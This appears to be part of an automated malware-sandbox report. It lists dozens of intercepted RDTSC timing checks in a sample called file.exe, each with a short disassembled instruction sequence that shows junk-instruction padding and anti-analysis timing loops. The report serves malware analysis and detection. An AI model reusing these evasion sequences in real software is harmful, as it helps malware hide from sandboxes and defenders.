                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67999C second address: 6799B9 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F7174CEBA86h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jns 00007F7174CEBA8Ch 0x00000012 popad 0x00000013 push ebx 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 679536 second address: 679568 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7174BA6FDEh 0x00000008 jmp 00007F7174BA6FE5h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f jl 00007F7174BA6FD6h 0x00000015 popad 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67C316 second address: 67C322 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67C322 second address: 67C326 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67C326 second address: 67C32C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67C32C second address: 67C336 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F7174BA6FDEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67C744 second address: 67C74A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67C74A second address: 67C74E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67C74E second address: 67C752 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67C752 second address: 67C758 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67C758 second address: 67C761 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67C761 second address: 67C767 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67C767 second address: 67C76F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6843C9 second address: 6843CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6843CD second address: 6843D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 683436 second address: 68343C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68343C second address: 683447 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 683447 second address: 683451 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F7174BA6FD6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6835D8 second address: 6835E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F7174CEBA86h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6840EB second address: 684110 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7174BA6FE3h 0x00000009 pop edi 0x0000000a pop edi 0x0000000b push edi 0x0000000c pushad 0x0000000d js 00007F7174BA6FD6h 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 687CE3 second address: 687D06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jc 00007F7174CEBA88h 0x0000000b push edx 0x0000000c pop edx 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F7174CEBA91h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68B63D second address: 68B646 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68B646 second address: 68B650 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F7174CEBA86h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68B650 second address: 68B656 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ED57C second address: 5ED593 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a js 00007F7174CEBA86h 0x00000010 push eax 0x00000011 pop eax 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68B05C second address: 68B062 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68B062 second address: 68B066 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 691F36 second address: 691F5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7174BA6FDAh 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F7174BA6FE6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 691F5F second address: 691F65 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6920D2 second address: 692103 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F7174BA6FEDh 0x0000000a pushad 0x0000000b jmp 00007F7174BA6FDDh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 692526 second address: 69252A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6927FD second address: 69280D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007F7174BA6FDCh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 692D60 second address: 692D72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F7174CEBA8Eh 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 693017 second address: 693034 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7174BA6FE7h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 693034 second address: 693050 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jnl 00007F7174CEBA86h 0x00000009 pop edx 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d jng 00007F7174CEBA86h 0x00000013 pop eax 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 693050 second address: 693054 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 693054 second address: 693082 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7174CEBA90h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jno 00007F7174CEBA9Ah 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 693082 second address: 69308A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69308A second address: 69308E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69308E second address: 693092 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69337E second address: 69339C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edi 0x00000004 pop edi 0x00000005 je 00007F7174CEBA86h 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7174CEBA90h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69393A second address: 693944 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F7174BA6FD6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 693944 second address: 693948 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 693948 second address: 693957 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F7174BA6FD6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 693957 second address: 69395D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69395D second address: 693962 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 693962 second address: 693983 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7174CEBA8Ch 0x00000007 ja 00007F7174CEBA97h 0x0000000d jmp 00007F7174CEBA8Bh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69BF69 second address: 69BF6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69BF6D second address: 69BF8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 jmp 00007F7174CEBA93h 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69BF8C second address: 69BF90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69C0E9 second address: 69C0F7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jp 00007F7174CEBA86h 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69C0F7 second address: 69C0FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69C0FB second address: 69C0FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69C4BA second address: 69C4E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 jmp 00007F7174BA6FDCh 0x0000000c pop esi 0x0000000d push eax 0x0000000e pushad 0x0000000f jmp 00007F7174BA6FDEh 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A48CB second address: 6A48D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A48D1 second address: 6A48D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A48D9 second address: 6A48EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007F7174CEBA86h 0x0000000d jc 00007F7174CEBA86h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A4A3A second address: 6A4A44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F7174BA6FD6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A4A44 second address: 6A4A50 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A4A50 second address: 6A4A5C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F7174BA6FD6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A4A5C second address: 6A4A67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jnp 00007F7174CEBA86h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A4A67 second address: 6A4A9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c push edi 0x0000000d pop edi 0x0000000e jmp 00007F7174BA6FE3h 0x00000013 popad 0x00000014 jno 00007F7174BA6FE2h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A4A9B second address: 6A4ABF instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F7174CEBA94h 0x00000008 push eax 0x00000009 push edx 0x0000000a jc 00007F7174CEBA86h 0x00000010 jne 00007F7174CEBA86h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A4ABF second address: 6A4AC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A4C12 second address: 6A4C16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A4C16 second address: 6A4C1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A4DB5 second address: 6A4DBA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A4DBA second address: 6A4DC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A50CB second address: 6A50D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A50D9 second address: 6A50DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A610E second address: 6A6131 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F7174CEBA97h 0x00000008 pop eax 0x00000009 jl 00007F7174CEBA92h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A3F3E second address: 6A3F7A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7174BA6FE4h 0x00000007 jng 00007F7174BA6FE2h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F7174BA6FE0h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1015C second address: 4A10227 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov ax, bx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov cl, 09h 0x0000000f mov ecx, edx 0x00000011 popad 0x00000012 xchg eax, esi 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F7174CEBA91h 0x0000001a and eax, 3AE70106h 0x00000020 jmp 00007F7174CEBA91h 0x00000025 popfd 0x00000026 push esi 0x00000027 pushfd 0x00000028 jmp 00007F7174CEBA97h 0x0000002d sbb esi, 47F5703Eh 0x00000033 jmp 00007F7174CEBA99h 0x00000038 popfd 0x00000039 pop ecx 0x0000003a popad 0x0000003b mov esi, dword ptr [74E806ECh] 0x00000041 jmp 00007F7174CEBA97h 0x00000046 test esi, esi 0x00000048 jmp 00007F7174CEBA96h 0x0000004d jne 00007F7174CEC99Dh 0x00000053 jmp 00007F7174CEBA90h 0x00000058 xchg eax, edi 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10227 second address: 4A1022B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1022B second address: 4A10231 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10231 second address: 4A10285 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, BED1h 0x00000007 pushfd 0x00000008 jmp 00007F7174BA6FDEh 0x0000000d sub si, A128h 0x00000012 jmp 00007F7174BA6FDBh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c jmp 00007F7174BA6FE9h 0x00000021 xchg eax, edi 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F7174BA6FDDh 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10285 second address: 4A102C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7174CEBA91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 call dword ptr [74E50B60h] 0x0000000f mov eax, 750BE5E0h 0x00000014 ret 0x00000015 jmp 00007F7174CEBA8Eh 0x0000001a push 00000044h 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F7174CEBA97h 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A102C9 second address: 4A103EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7174BA6FDFh 0x00000009 or si, 328Eh 0x0000000e jmp 00007F7174BA6FE9h 0x00000013 popfd 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 pop edi 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F7174BA6FDAh 0x00000021 xor si, 7D08h 0x00000026 jmp 00007F7174BA6FDBh 0x0000002b popfd 0x0000002c pushfd 0x0000002d jmp 00007F7174BA6FE8h 0x00000032 and esi, 32AD1F68h 0x00000038 jmp 00007F7174BA6FDBh 0x0000003d popfd 0x0000003e popad 0x0000003f xchg eax, edi 0x00000040 jmp 00007F7174BA6FE6h 0x00000045 push eax 0x00000046 pushad 0x00000047 pushfd 0x00000048 jmp 00007F7174BA6FE1h 0x0000004d or al, 00000036h 0x00000050 jmp 00007F7174BA6FE1h 0x00000055 popfd 0x00000056 call 00007F7174BA6FE0h 0x0000005b jmp 00007F7174BA6FE2h 0x00000060 pop ecx 0x00000061 popad 0x00000062 xchg eax, edi 0x00000063 jmp 00007F7174BA6FE1h 0x00000068 push dword ptr [eax] 0x0000006a jmp 00007F7174BA6FDEh 0x0000006f mov eax, dword ptr fs:[00000030h] 0x00000075 push eax 0x00000076 push edx 0x00000077 jmp 00007F7174BA6FE7h 0x0000007c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A103EF second address: 4A10407 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7174CEBA94h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A104CA second address: 4A104D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A104D0 second address: 4A104D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A104D4 second address: 4A10577 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+08h], eax 0x0000000b jmp 00007F7174BA6FE9h 0x00000010 mov dword ptr [esi+0Ch], eax 0x00000013 pushad 0x00000014 mov cx, 6683h 0x00000018 call 00007F7174BA6FE8h 0x0000001d movzx eax, bx 0x00000020 pop edx 0x00000021 popad 0x00000022 mov eax, dword ptr [ebx+4Ch] 0x00000025 pushad 0x00000026 call 00007F7174BA6FE8h 0x0000002b pushfd 0x0000002c jmp 00007F7174BA6FE2h 0x00000031 adc cl, FFFFFFD8h 0x00000034 jmp 00007F7174BA6FDBh 0x00000039 popfd 0x0000003a pop ecx 0x0000003b call 00007F7174BA6FE9h 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10577 second address: 4A105AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 mov dword ptr [esi+10h], eax 0x00000009 jmp 00007F7174CEBA8Dh 0x0000000e mov eax, dword ptr [ebx+50h] 0x00000011 jmp 00007F7174CEBA8Eh 0x00000016 mov dword ptr [esi+14h], eax 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov si, dx 0x0000001f mov ebx, 017A39DCh 0x00000024 popad 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A105AD second address: 4A10616 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7174BA6FE2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+54h] 0x0000000c pushad 0x0000000d mov bx, cx 0x00000010 jmp 00007F7174BA6FDAh 0x00000015 popad 0x00000016 mov dword ptr [esi+18h], eax 0x00000019 jmp 00007F7174BA6FE0h 0x0000001e mov eax, dword ptr [ebx+58h] 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007F7174BA6FDDh 0x0000002a or cx, CA46h 0x0000002f jmp 00007F7174BA6FE1h 0x00000034 popfd 0x00000035 push esi 0x00000036 pop edx 0x00000037 popad 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10616 second address: 4A1062E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7174CEBA93h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1062E second address: 4A1063E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esi+1Ch], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1063E second address: 4A10642 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10642 second address: 4A10646 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
